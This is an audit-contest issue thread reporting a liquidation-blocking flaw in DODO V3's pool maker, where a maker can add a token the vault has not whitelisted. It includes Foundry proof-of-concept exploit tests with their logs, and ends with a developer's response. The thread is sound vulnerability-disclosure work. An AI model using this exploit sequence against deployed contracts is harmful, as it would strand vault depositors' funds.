### ISSUE TITLE
Kalyan-Singh - Malicious Pool owner/maker can add any token with chainlink price feed and break pool liquidation + steal vault

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-06-dodo-judging#216]
Kalyan-Singh

high

# Malicious Pool owner/maker can add any token with chainlink price feed and break pool liquidation + steal vault

## Summary
Pool creator can add a new token which can make not liquidatable by vault and lead to loss of user funds.

## Vulnerability Detail
anyone can deposit a token which is not allowed by vault in a pool and could swap them for whitelisted tokens. If this unwhitelisted token's price falls liquidation will still not be possible

[https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Maker.sol#L158-L213](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Maker.sol#L158-L213)

[https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Funding.sol#L58-L71](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Funding.sol#L58-L71)

[https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Trading.sol#L129-L165](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Trading.sol#L129-L165)

poc- 
1. Suppose token 3 - 1$ , token2 = 12$ and token5 = 2$
2. token3 and token2 are whitelisted by a vault but not token5 
3. pool has 100 token3 and it borrows 10 token2 
4. now someone or malicious pool creator/maker adds the more volatile token5 to the pool by calling D3Maker's setNewToken
5. now someone/he buys 99 token3s by giving appropriate token5s 
6. if the price of token5 falls, even to 0$ or 1$ , vault will not be able to liquidate the pool and depositer's funds will be lost.

## Impact
Loss of user funds + makes the pool not liquidatable by vault

## Code Snippet
POC-

`
function setUp() public {
        contextBasic();
        setVaultAsset();

        vm.label(poolCreator,"poolCreator");
        vm.label(user1,"user1");

        d3Maker = new D3Maker();
        d3Maker.init(poolCreator, address(d3MM),100000);
        vm.prank(poolCreator);
        d3MM.setNewMaker(address(d3Maker));

        uint allFlag = (2**10)-1;
        d3MM.setAllFlagByAnyone(allFlag);
    } 

    function testHackPoc1() public {
        // initial price of token5
        assertEq(token5ChainLinkOracle.price(),2 ether);

        // getting all tokenInfo
        MakerTypes.TokenMMInfoWithoutCum memory token1Info = contructToken1MMInfo();
        MakerTypes.TokenMMInfoWithoutCum memory token2Info = contructToken2MMInfo();
        MakerTypes.TokenMMInfoWithoutCum memory token3Info = contructToken3MMInfo();
        MakerTypes.TokenMMInfoWithoutCum memory token5Info = contructToken5MMInfo();

        // pool has 100 ether of token3 deposited by someone
        token3.mint(address(d3MM), 100 ether);
        d3MM.updateReserve(address(token3));

        // first maker only sets 3 tokens
        vm.startPrank(poolCreator);
        d3Maker.setNewToken(address(token1), true, token1Info.priceInfo, token1Info.amountInfo, token1Info.kAsk, token1Info.kBid, 18);
        d3Maker.setNewToken(address(token2), true, token2Info.priceInfo, token2Info.amountInfo, token2Info.kAsk, token1Info.kBid, 8);
        d3Maker.setNewToken(address(token3), false, token3Info.priceInfo, token3Info.amountInfo, token3Info.kAsk, token1Info.kBid, 18);
        vm.stopPrank();

        // check vault's and pool's  initial balances
        assertEq(token3.balanceOf(address(d3Vault)), 500  ether);
        assertEq(token2.balanceOf(address(d3Vault)), 500 ether);
        assertEq(token1.balanceOf(address(d3Vault)), 500 * 1e8);
        assertEq(token5.balanceOf(address(d3Vault)), 0);

        assertEq(token3.balanceOf(address(d3MM)), 100 ether);
        assertEq(token2.balanceOf(address(d3MM)), 0);
        assertEq(token1.balanceOf(address(d3MM)), 0);
        assertEq(token5.balanceOf(address(d3MM)), 0);

        // borrow 10 token2
        poolBorrow(address(d3MM), address(token2), 10 ether);
        assertEq(token2.balanceOf(address(d3MM)), 10 ether);

        // attackBegins

        // maker adds a new token not in the vault
        token5.mint(poolCreator, 500 ether);

        SwapCallbackData memory swapData;
        swapData.data = "";
        swapData.payer = poolCreator;

        vm.startPrank(poolCreator);
        d3Maker.setNewToken(address(token5), false, token5Info.priceInfo, token5Info.amountInfo, token5Info.kAsk, token1Info.kBid, 18);
        token5.approve(address(dodoApprove), 60 ether);

        // buys token3 for token5

        uint payFromAmount3 = d3Proxy.buyTokens(
            address(d3MM),
            poolCreator,
            address(token5),
            address(token3),
            99 ether,
            60 ether,
            abi.encode(swapData),
            block.timestamp + 1000
        );

        emit log_named_decimal_uint("token5 paid to get 99 token3", payFromAmount3, 18);

        vm.stopPrank();

        // liquidation check
        d3Vault.accrueInterests();
        assertEq(d3Vault.checkCanBeLiquidatedAfterAccrue(address(d3MM)),false);

        // even if token5 falls to 0, no funds can be recovered from pool by vault
        // hence loss of user funds
        token5ChainLinkOracle.feedData(0);
        assertEq(token5ChainLinkOracle.price(),0);
        assertEq(d3Vault.checkCanBeLiquidated(address(d3MM)),false);

        // try liquidating
        vm.prank(vaultOwner);
        d3Vault.addLiquidator(address(this));
        d3Vault.accrueInterests();
        assertEq(d3Vault.checkCanBeLiquidatedAfterAccrue(address(d3MM)),false);

        logCollateralRatio(address(d3MM));

        // check vault's and pool's  final balances
        assertEq(token3.balanceOf(address(d3Vault)), 500 ether);
        assertEq(token2.balanceOf(address(d3Vault)), 490 ether);
        assertEq(token1.balanceOf(address(d3Vault)), 500 * 1e8);
        assertEq(token5.balanceOf(address(d3Vault)), 0);

        // assertEq(token3.balanceOf(address(d3MM)), 1 ether);  not exactly 1 ether due to swap fee
        assertEq(token2.balanceOf(address(d3MM)), 10 ether);
        assertEq(token1.balanceOf(address(d3MM)), 0);
        assertEq(token5.balanceOf(address(d3MM)), payFromAmount3);

        address [] memory  tokenList = d3Vault.getTokenList();

        assertEq(tokenList.length, 3);  // only 3 tokens still

    }

}

`

## Tool used

Manual Review

## Recommendation
My recommendation is that d3Maker should check whether the newly added token is whitelisted in its vault of or not.

**Comment by Kalyan-Singh** [comment]
Adding some comments for better clarity- 

In dodo v3 there are 3 states which define what a valid token is- 
1. priceSources mapping in D3Oracle [here](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/periphery/D3Oracle.sol#L20)
2. tokenList array in D3VaultStorage [here](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Vault/D3VaultStorage.sol#L27)
3. 'state' variable of type MakerState in D3Maker [here](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Storage.sol#L10)

But the problem is the MakerState can be modified by a 'RESTRICTED' authority (as per scope of this audit) in such a way that allows him to DOS the Liquidation functionality of a vault. The root cause is the following check [here](https://github.com/sherlock-audit/2023-06-dodo/blob/a8d30e611acc9762029f8756d6a5b81825faf348/new-dodo-v3/contracts/DODOV3MM/D3Pool/D3Funding.sol#L65-L67)
```
if(_checkTokenInTokenlist(token) && allowance < type(uint256).max) {

IERC20(token).approve(state._D3_VAULT_, type(uint256).max);

}
```

which is applied in all state modifying functions of D3Funding.sol, its supposed work is to give the unlimited allowance to force liquidate but it queries the incorrect state. 


POC - 
1. The D3Oracle has 3 priceSource i.e for {DAI- 1usd, LINK - 2usd , ETH- 12 usd}
2. Since most vaults usually allow depositing 1 or 2 tokens, let's assume there are 2 vaults one with {DAI, ETH} & another with {Link , Eth}
3. Now a malicious pool maker/creator sees this, his pool(linked to vault1) has 100 ether of DAI, so he takes loan of 12 ether ethereum from the vault1, having colletralRatioBorrow = 83%
4. Now the maker adds LINK in his pool as well. When adding a new token to a pool only D3Oracle is queried for token's validity, so it is added without a problem
5. Now he swaps out most of his pool's DAI to LINK but the vault does not gain any allowance to LINK
6. If the maker now does not refill DAI, funds will be stuck in the pool and vault wont be able to liquidate LINK, any amount of LINK deposited through 'makerDeposit' will not help as LINK will  return false on '_checkTokenInTokenlist(LINK)'. 


Please add the following code in D3Maker.t.sol under the MakerTest contract to verify-

```
struct SwapCallbackData {

bytes data;

address payer;

}

using DecimalMath for uint256;

  
  

function testHackPoc() public {

  

// adding token5 to the d3oracle

MockERC20 token5;

MockChainlinkPriceFeed token5ChainLinkOracle;

  

token5 = new MockERC20("Token5", "TK5", 18);

token5ChainLinkOracle = new MockChainlinkPriceFeed("Token5/USD", 18);

token5ChainLinkOracle.feedData(2 * 1e18);

  

oracle.setPriceSource(

address(token5), PriceSource(address(token5ChainLinkOracle), true, 5 * (10 ** 17), 18, 18, 3600)

);

  

// initial price of token5

assertEq(token5ChainLinkOracle.price(),2 ether);

  
  

// getting all tokenInfo

MakerTypes.TokenMMInfoWithoutCum memory token2Info = contructToken2MMInfo();

MakerTypes.TokenMMInfoWithoutCum memory token3Info = contructToken3MMInfo();

// setting up contructToken5MMInfo

MakerTypes.TokenMMInfoWithoutCum memory token5Info;

token5Info.priceInfo = stickPrice(2, 18, 6, 12, 10);

token5Info.amountInfo = stickAmount(300, 18, 300, 18);

token5Info.kAsk = token5Info.kBid = 1000;

token5Info.decimal = 18;

  

// maker only sets 2 tokens

vm.startPrank(owner);

d3Maker.setNewToken(address(token2), true, token2Info.priceInfo, token2Info.amountInfo, token2Info.kAsk, token2Info.kBid, 8);

d3Maker.setNewToken(address(token3), false, token3Info.priceInfo, token3Info.amountInfo, token3Info.kAsk, token3Info.kBid, 18);

vm.stopPrank();

  

// removing unnessary liquidity(added during setUp() ) for simplicity

token3.burn(address(d3MM), token3.balanceOf(address(d3MM)));

token2.burn(address(d3MM), token2.balanceOf(address(d3MM)));

token1.burn(address(d3MM), token1.balanceOf(address(d3MM)));

d3MM.updateReserve(address(token3));

d3MM.updateReserve(address(token2));

d3MM.updateReserve(address(token1));

  
  

// pool has 100 ether of token3 deposited by someone

token3.mint(address(d3MM), 100 ether);

d3MM.updateReserve(address(token3));

  

// check vault's and pool's initial balances

assertEq(token3.balanceOf(address(d3Vault)), 500 ether);

assertEq(token2.balanceOf(address(d3Vault)), 500 ether);

assertEq(token5.balanceOf(address(d3Vault)), 0);

  
  

assertEq(token3.balanceOf(address(d3MM)), 100 ether);

assertEq(token2.balanceOf(address(d3MM)), 0);

assertEq(token5.balanceOf(address(d3MM)), 0);

  

// borrow 10 token2

poolBorrow(address(d3MM), address(token2), 10 ether);

assertEq(token2.balanceOf(address(d3MM)), 10 ether);

  

emit log_named_decimal_int("Token2 price", token2ChainLinkOracle.price(), 18);

console.log("Ratio after borrowing 10 token2");

logCollateralRatio(address(d3MM));

  

// now pool maker/ creator goes rogue

  

// maker adds a new token not in the vault

token5.mint(owner, 500 ether);

  

vm.startPrank(owner);

d3Maker.setNewToken(address(token5), false, token5Info.priceInfo, token5Info.amountInfo, token5Info.kAsk, token5Info.kBid, 18);

token5.approve(address(dodoApprove), 60 ether);

  

// logging assests & debt before swap

emit log_named_decimal_uint("Total Asset Value", d3Vault.getTotalAssetsValue(address(d3MM)), 18);

emit log_named_decimal_uint("Total Debt Value", d3Vault.getTotalDebtValue(address(d3MM)), 18);

  

console.log("================");

  

// swaps token3 for token5

SwapCallbackData memory swapData;

swapData.data = "";

swapData.payer = owner;

  

uint payFromAmount3 = d3Proxy.buyTokens(

address(d3MM),

owner,

address(token5),

address(token3),

99.8 ether,

100 ether,

abi.encode(swapData),

block.timestamp + 1000

);

  

vm.stopPrank();

  

emit log_named_decimal_uint("Token3 balance of attacker", token3.balanceOf(owner), 18);

emit log_named_decimal_uint("Token5 balance of attacker", token5.balanceOf(owner), 18);

emit log_named_decimal_uint("Token3 balance of pool", token3.balanceOf(address(d3MM)), 18);

emit log_named_decimal_uint("Token5 balance of pool", token5.balanceOf(address(d3MM)), 18);

emit log_named_decimal_uint("Total Asset Value(after)", d3Vault.getTotalAssetsValue(address(d3MM)), 18);

emit log_named_decimal_uint("Total Debt Value(after)", d3Vault.getTotalDebtValue(address(d3MM)), 18);

  

// some time passes

vm.warp(37 hours);

d3Vault.accrueInterests();

assertEq(d3Vault.checkCanBeLiquidated(address(d3MM)),true);

  

logCollateralRatio(address(d3MM));

  

uint debtToCover = 1 ether;

uint token2Price = uint (token2ChainLinkOracle.price());

uint token3Price = uint (token3ChainLinkOracle.price());

uint token5Price =uint(token5ChainLinkOracle.price());

  

token2.mint(address(this),10 ether);

  

// tries to repay the debt with token5 but fails as there is no allowance from d3mm to d3vault for token5

uint collateralAmount5 = debtToCover.mul(token2Price).div(token5Price.mul(95e16));

vm.expectRevert(bytes("ALLOWANCE_NOT_ENOUGH"));

d3Vault.liquidate(address(d3MM), address(token5), collateralAmount5, address(token2), debtToCover);

//tries to repay the debt but fails as there is not enough balance of token3 in the pool

uint collateralAmount3 = debtToCover.mul(token2Price).div(token3Price.mul(95e16));

token2.approve(address(d3Vault),10 ether);

vm.expectRevert(bytes("D3VAULT_COLLATERAL_AMOUNT_EXCEED"));

d3Vault.liquidate(address(d3MM), address(token3), collateralAmount3, address(token2), debtToCover);

// token5 has balance but no allowance

assertEq(token5.allowance(address(d3MM),address(d3Vault)), 0);

// token3 has max allowance but no balance to liquidate from

assertEq(token3.allowance(address(d3MM),address(d3Vault)), type(uint256).max);

}
```

Logs:
  Token2 price: 12.000000000000000000
  Ratio after borrowing 10 token2
  collateralRatio 11579208923731619542357098500868790785326998466564056403945758 %
  collateralRatioBorrow 83 %
  
  Total Asset Value: 220.000000000000000000
  Total Debt Value: 120.000000000000000000
  
  Token3 balance of attacker: 99.800000000000000000
  Token5 balance of attacker: 449.935133400837333518
  Token3 balance of pool: 0.160080000000000000
  Token5 balance of pool: 50.064866599162666482
  Total Asset Value(after): 120.160080000000000000
  Total Debt Value(after): 120.000000000000000000
  collateralRatio 117 %
  collateralRatioBorrow 0 %

Recommended mitigation could be as said in the issue or just query the MakerState to give unlimited allowance instead of vault state. 
The poc i gave in the issue doesnt work cause i made many changes directly to testContext but i do believe this is a valid finding as dos to liquidation means loss of user deposited vault funds.

**Comment by Kalyan-Singh** [comment]
@traceurl  @Attens1423  can i get a comment here?

**Comment by traceurl** [comment]
Like D3Vault, D3Oracle is also owned by DODO team. We will whitelist reliable tokens on D3Oracle. Thus in your POC, if Link's price crashes like Luna, we will blacklist it in D3Oracle.
